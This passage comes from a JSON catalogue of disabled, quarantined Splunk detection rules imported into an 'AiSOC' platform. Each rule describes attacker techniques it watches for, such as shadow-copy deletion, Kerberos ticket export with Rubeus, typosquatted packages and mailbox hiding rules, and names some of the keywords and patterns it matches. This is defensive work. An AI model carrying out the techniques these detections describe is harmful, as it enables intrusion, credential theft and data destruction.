"log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-export-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e38ded4-c964-41f4-8cb6-4a1a53c6929f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_export_certificate.yml" } }, { "id": "splunk-security-content-5e3f6b44-42cb-4f8a-99f0-59e78a52ea1d", "type": "detection", "name": "Cisco NVM - Installation of Typosquatted Python Package", "description": "This analytic detects suspicious python package installations where the package name resembles popular Python libraries but may be typosquatted or slightly altered.\nTyposquatting is a common technique used by attackers to trick users into installing malicious packages that mimic legitimate ones.\nThis detection leverages Cisco NVM flow telemetry and checks for pip or poetry package managers with the \"install\" or \"add\" flags, making outbound connections to package repository such as `pypi.org` with known or suspected typo package names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-installation-of-typosquatted-python-package.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e3f6b44-42cb-4f8a-99f0-59e78a52ea1d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___installation_of_typosquatted_python_package.yml" } }, { "id": "splunk-security-content-5eb479b1-a5ea-4e01-8365-780078613776", "type": "detection", "name": "Windows Modify Registry Risk Behavior", "description": "The following analytic identifies instances where three or more distinct registry modification events associated with MITRE ATT&CK Technique T1112 are detected. It leverages data from the Risk data model in Splunk, focusing on registry-related sources and MITRE technique annotations. This activity is significant because multiple registry modifications can indicate an attempt to persist, hide malicious configurations, or erase forensic evidence. If confirmed malicious, this behavior could allow attackers to maintain persistent access, execute malicious code, and evade detection, posing a severe threat to the integrity and security of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5eb479b1-a5ea-4e01-8365-780078613776", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_risk_behavior.yml" } }, { "id": "splunk-security-content-5eb76fe2-a869-4865-8c4c-8cff424b18a1", "type": "detection", "name": "Windows PowerShell Invoke-Sqlcmd Execution", "description": "This detection identifies potentially suspicious usage of Invoke-Sqlcmd PowerShell cmdlet, which can be used for database operations and potential data exfiltration. The detection looks for suspicious parameter combinations and query patterns that may indicate unauthorized database access, data theft, or malicious database operations. Threat actors may prefer using PowerShell Invoke-Sqlcmd over sqlcmd.exe as it provides a more flexible programmatic interface and can better evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-invoke-sqlcmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5eb76fe2-a869-4865-8c4c-8cff424b18a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_invoke_sqlcmd_execution.yml" } }, { "id": "splunk-security-content-5eb76fe2-a869-4865-8c4c-8cff424b18b1", "type": "detection", "name": "Windows SQL Server xp_cmdshell Config Change", "description": "This detection identifies when the xp_cmdshell configuration is modified in SQL Server. The xp_cmdshell extended stored procedure allows execution of operating system commands and programs from SQL Server, making it a high-risk feature commonly abused by attackers for privilege escalation and lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-xp-cmdshell-config-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5eb76fe2-a869-4865-8c4c-8cff424b18b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_xp_cmdshell_config_change.yml" } }, { "id": "splunk-security-content-5ed8c50a-8869-11ec-876f-acde48001122", "type": "detection", "name": "Rubeus Kerberos Ticket Exports Through Winlogon Access", "description": "The following analytic detects a process accessing the winlogon.exe system process, indicative of the Rubeus tool attempting to export Kerberos tickets from memory. This detection leverages Sysmon EventCode 10 logs, focusing on processes obtaining a handle to winlogon.exe with specific access rights. This activity is significant as it often precedes pass-the-ticket attacks, where adversaries use stolen Kerberos tickets to move laterally within an environment. If confirmed malicious, this could allow attackers to bypass normal access controls, escalate privileges, and persist within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rubeus-kerberos-ticket-exports-through-winlogon-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ed8c50a-8869-11ec-876f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rubeus_kerberos_ticket_exports_through_winlogon_access.yml" } }, { "id": "splunk-security-content-5ee2bcd0-b2ff-11eb-bb34-acde48001122", "type": "detection", "name": "Delete ShadowCopy With PowerShell", "description": "The following analytic detects the use of PowerShell to delete shadow copies via the WMIC PowerShell module. It leverages EventCode 4104 and searches for specific keywords like \"ShadowCopy,\" \"Delete,\" or \"Remove\" within the ScriptBlockText. This activity is significant because deleting shadow copies is a common tactic used by ransomware, such as DarkSide, to prevent data recovery. If confirmed malicious, this action could lead to irreversible data loss and hinder recovery efforts, significantly impacting business continuity and data integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/delete-shadowcopy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ee2bcd0-b2ff-11eb-bb34-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/delete_shadowcopy_with_powershell.yml" } }, { "id": "splunk-security-content-5ee98b2f-8b9e-457a-8bdc-dd41aaba9e87", "type": "detection", "name": "Windows Registry Certificate Added", "description": "The following analytic detects the installation of a root CA certificate by monitoring specific registry paths for SetValue events. It leverages data from the Endpoint datamodel, focusing on registry paths containing \"certificates\" and registry values named \"Blob.\" This activity is significant because unauthorized root CA certificates can compromise the integrity of encrypted communications and facilitate man-in-the-middle attacks. If confirmed malicious, this could allow an attacker to intercept, decrypt, or manipulate sensitive data, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-certificate-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ee98b2f-8b9e-457a-8bdc-dd41aaba9e87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_certificate_added.yml" } }, { "id": "splunk-security-content-5f1d2ea7-eec0-4790-8b24-6875312ad492", "type": "detection", "name": "Linux Auditd File Permission Modification Via Chmod", "description": "The following analytic detects suspicious file permission modifications using the `chmod` command, which may indicate an attacker attempting to alter access controls on critical files or directories. Such modifications can be used to grant unauthorized users elevated privileges or to conceal malicious activities by restricting legitimate access. By monitoring for unusual or unauthorized `chmod` usage, this analytic helps identify potential security breaches, allowing security teams to respond promptly to prevent privilege escalation, data tampering, or other unauthorized actions on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-file-permission-modification-via-chmod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f1d2ea7-eec0-4790-8b24-6875312ad492", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_file_permission_modification_via_chmod.yml" } }, { "id": "splunk-security-content-5f661629-9750-4cb9-897c-1f05d6db8727", "type": "detection", "name": "Okta Unauthorized Access to Application", "description": "The following analytic identifies attempts by users to access Okta applications that have not been assigned to them. It leverages Okta Identity Management logs, specifically focusing on failed access attempts to unassigned applications. This activity is significant for a SOC as it may indicate potential unauthorized access attempts, which could lead to exposure of sensitive information or disruption of services. If confirmed malicious, such activity could result in data breaches, non-compliance with data protection laws, and overall compromise of the IT environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-unauthorized-access-to-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f661629-9750-4cb9-897c-1f05d6db8727", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_unauthorized_access_to_application.yml" } }, { "id": "splunk-security-content-5f694cc4-a678-4a60-9410-bffca1b647dc", "type": "detection", "name": "O365 PST export alert", "description": "The following analytic detects instances where a user has initiated an eDiscovery search or exported a PST file in an Office 365 environment. It leverages Office 365 management activity logs, specifically filtering for events under ThreatManagement with the name \"eDiscovery search started or exported.\" This activity is significant as it may indicate data exfiltration attempts or unauthorized access to sensitive information. If confirmed malicious, it suggests an attacker or insider threat is attempting to gather or exfiltrate data, potentially leading to data breaches, loss of intellectual property, or unauthorized access to confidential communications. Immediate investigation is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-pst-export-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f694cc4-a678-4a60-9410-bffca1b647dc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_pst_export_alert.yml" } }, { "id": "splunk-security-content-5f7d8c3e-9a2b-4d6f-8e1c-3b5a9d7f2c4e", "type": "detection", "name": "Cisco ASA - User Privilege Level Change", "description": "This analytic detects privilege level changes for user accounts on Cisco ASA devices via CLI or ASDM.\nAdversaries may escalate account privileges to gain elevated access to network infrastructure, enable additional command execution capabilities, or establish higher-level persistent access. Privilege levels on Cisco ASA range from 0 (lowest) to 15 (full administrative access), with level 15 providing complete device control.\nThe detection monitors for ASA message ID 502103, which is generated whenever a user account's privilege level is modified, capturing both the old and new privilege levels along with the username and administrator who made the change.\nInvestigate unexpected privilege changes, especially escalations to level 15, substantial privilege increases (e.g., from level 1 to 15), changes performed outside business hours, changes by non-administrative users, or changes without corresponding change management tickets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-user-privilege-level-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f7d8c3e-9a2b-4d6f-8e1c-3b5a9d7f2c4e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___user_privilege_level_change.yml" } }, { "id": "splunk-security-content-5f8671b6-07a7-425d-b3da-c39a53f2a6ae", "type": "detection", "name": "Windows RDP Bitmap Cache File Creation", "description": "This detection identifies the creation of Remote Desktop Protocol (RDP) bitmap cache files on a Windows system, typically located in the user\u2019s profile under the Terminal Server Client cache directory. These files (*.bmc, cache*.bin) are generated when a user initiates an RDP session using the built-in mstsc.exe client. Their presence can indicate interactive remote access activity and may be useful in detecting lateral movement or unauthorized RDP usage. Monitoring this behavior is especially important, as attackers may attempt to delete or suppress these artifacts to evade forensic analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-bitmap-cache-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f8671b6-07a7-425d-b3da-c39a53f2a6ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_bitmap_cache_file_creation.yml" } }, { "id": "splunk-security-content-5fde0b7c-df7a-40b1-9b3a-294c00f0289d", "type": "detection", "name": "Windows AD Same Domain SID History Addition", "description": "The following analytic detects changes to the sIDHistory attribute of user or computer objects within the same domain. It leverages Windows Security Event Codes 4738 and 4742 to identify when the sIDHistory attribute is modified. This activity is significant because the sIDHistory attribute can be abused by adversaries to grant unauthorized access by inheriting permissions from another account. If confirmed malicious, this could allow attackers to maintain persistent access or escalate privileges within the domain, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-same-domain-sid-history-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5fde0b7c-df7a-40b1-9b3a-294c00f0289d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_same_domain_sid_history_addition.yml" } }, { "id": "splunk-security-content-5ffaa42c-acdb-11eb-9ad3-acde48001122", "type": "detection", "name": "Process Kill Base On File Path", "description": "The following analytic detects the use of `wmic.exe` with the `delete` command to remove an executable path. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because it often indicates the initial stages of an adversary setting up malicious activities, such as cryptocurrency mining, on an endpoint. If confirmed malicious, this behavior could allow an attacker to disable security tools or other critical processes, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-kill-base-on-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ffaa42c-acdb-11eb-9ad3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_kill_base_on_file_path.yml" } }, { "id": "splunk-security-content-60023bb6-5500-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious mshta child process", "description": "The following analytic identifies child processes spawned from \"mshta.exe\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific child processes like \"powershell.exe\" and \"cmd.exe\". This activity is significant because \"mshta.exe\" is often exploited by attackers to execute malicious scripts or commands. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment. Monitoring this activity helps in early detection of potential threats leveraging \"mshta.exe\" for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-mshta-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "60023bb6-5500-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_mshta_child_process.yml" } }, { "id": "splunk-security-content-603ebac2-f157-4df7-a6ac-34e8d0350f86", "type": "detection", "name": "O365 BEC Email Hiding Rule Created", "description": "This analytic detects mailbox rule creation, a common technique used in Business Email Compromise. It uses a scoring mechanism to identify a combination of attributes often featured in mailbox rules created by attackers. This may indicate that an attacker has gained access to the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-bec-email-hiding-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "603ebac2-f157-4df7-a6ac-34e8d0350f86", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_bec_email_hiding_rule_created.yml" } }, { "id": "splunk-security-content-605cc93a-70e4-4ee3-9a3d-1a62e8c9b6c2", "type": "detection", "name": "O365 Threat Intelligence Suspicious Email Delivered", "description": "The following analytic identifies when a suspicious email is detected within the Microsoft Office 365 ecosystem through the Advanced Threat Protection engine and delivered to an end user. Attackers may execute several attacks through email, any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. Certain premium Office 365 capabilities such as Safe Attachment and Safe Links further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-threat-intelligence-suspicious-email-delivered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "605cc93a-70e4-4ee3-9a3d-1a62e8c9b6c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_threat_intelligence_suspicious_email_delivered.yml" } }, { "id": "splunk-security-content-609ced68-d420-4ff7-8164-ae98b4b4018c", "type": "detection", "name": "ASL AWS IAM Delete Policy", "description": "The following analytic identifies when a policy is deleted in AWS. It leverages Amazon Security Lake logs to detect the DeletePolicy API operation. Monitoring policy deletions is crucial as it can indicate unauthorized attempts to weaken security controls. If confirmed malicious, this activity could allow an attacker to remove critical security policies, potentially leading to privilege escalation or unauthorized access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-delete-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "609ced68-d420-4ff7-8164-ae98b4b4018c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_delete_policy.yml" } }, { "id": "splunk-security-content-60df805d-4605-41c8-bbba-57baa6a4eb97", "type": "detection", "name": "Windows Replication Through Removable Media", "description": "The following analytic detects the creation or dropping of executable or script files in the root directory of a removable drive. It leverages data from the Endpoint.Filesystem datamodel, focusing on specific file types and their creation paths. This activity is significant as it may indicate an attempt to spread malware, such as ransomware, via removable media. If confirmed malicious, this behavior could lead to unauthorized code execution, lateral movement, or persistence within the network, potentially compromising sensitive data and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-replication-through-removable-media.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "60df805d-4605-41c8-bbba-57baa6a4eb97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_replication_through_removable_media.yml" } }, { "id": "splunk-security-content-61059783-574b-40d2-ac2f-69b898afd6b4", "type": "detection", "name": "Linux Auditd Doas Conf File Creation", "description": "The following analytic detects the creation of the doas.conf file on a Linux host.\nThis file is used by the doas utility to allow standard users to perform tasks as root, similar to sudo.\nThe detection leverages Linux Auditd data, focusing on the creation of the doas.conf file.\nThis activity is significant because it can indicate an attempt to gain elevated privileges, potentially by an adversary. If confirmed malicious, this could allow an attacker to execute commands with root commands with root privileges, leading to full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-doas-conf-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61059783-574b-40d2-ac2f-69b898afd6b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_doas_conf_file_creation.yml" } }, { "id": "splunk-security-content-61490da9-52a1-4855-a0c5-28233c88c481", "type": "detection", "name": "Windows Masquerading Explorer As Child Process", "description": "The following analytic identifies instances where explorer.exe is spawned by unusual parent processes such as cmd.exe, powershell.exe, or regsvr32.exe.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships.\nThis activity is significant because explorer.exe is typically initiated by userinit.exe, and deviations from this norm can indicate code injection or process masquerading attempts by malware like Qakbot.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, evade detection, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-masquerading-explorer-as-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61490da9-52a1-4855-a0c5-28233c88c481", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_masquerading_explorer_as_child_process.yml" } }, { "id": "splunk-security-content-6153c5ea-ed30-4878-81e6-21ecdb198189", "type": "detection", "name": "AWS Credential Access RDS Password reset", "description": "The following analytic detects the resetting of the master user password for an Amazon RDS DB instance. It leverages AWS CloudTrail logs to identify events where the `ModifyDBInstance` API call includes a new `masterUserPassword` parameter. This activity is significant because unauthorized password resets can grant attackers access to sensitive data stored in production databases, such as credit card information, PII, and healthcare data. If confirmed malicious, this could lead to data breaches, regulatory non-compliance, and significant reputational damage. Immediate investigation is required to determine the legitimacy of the password reset.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-credential-access-rds-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6153c5ea-ed30-4878-81e6-21ecdb198189", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_credential_access_rds_password_reset.yml" } }, { "id": "splunk-security-content-6169ea23-3719-439f-957a-0ea5174b70e2", "type": "detection", "name": "GitHub Enterprise Delete Branch Ruleset", "description": "The following analytic detects when branch rules are deleted in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for branch rule deletion events by tracking actor details, repository information, and associated metadata. For a SOC, identifying deleted branch rules is critical as it could indicate attempts to bypass code review requirements and security controls. Branch deletion rules are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-delete-branch-ruleset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6169ea23-3719-439f-957a-0ea5174b70e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_delete_branch_ruleset.yml" } }, { "id": "splunk-security-content-61884b02-0dcf-44c5-9094-db33bac09fa6", "type": "detection", "name": "HTTP RMM User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of Remote Monitoring and Mangement applications. This activity can signify possible compromised hosts on the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-rmm-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61884b02-0dcf-44c5-9094-db33bac09fa6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 